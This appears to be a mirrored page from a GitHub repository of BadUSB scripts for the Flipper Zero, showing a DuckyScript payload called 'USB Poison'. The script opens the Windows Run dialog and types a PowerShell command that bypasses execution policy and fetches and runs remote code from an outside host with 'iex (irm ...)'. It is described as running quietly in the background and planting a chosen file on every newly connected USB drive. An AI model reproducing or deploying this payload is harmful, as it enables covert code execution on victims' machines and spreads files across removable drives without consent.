mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-15 17:11:25 -08:00
17 lines
569 B
Plaintext
17 lines
569 B
Plaintext
REM Title: USB Poison
|
|
REM Author: @beigeworm
|
|
REM Description: This script runs quietly in the background waiting for new USB storage devices.
|
|
REM Description: When a new storage device connects, this script will copy a desired file to the root of newly connected drive.
|
|
REM Target: Windows 10
|
|
|
|
REM some setup for dukie script
|
|
DEFAULT_DELAY 100
|
|
|
|
REM open powershell (remove "-W H" to show the window)
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps)
|
|
ENTER
|
|
|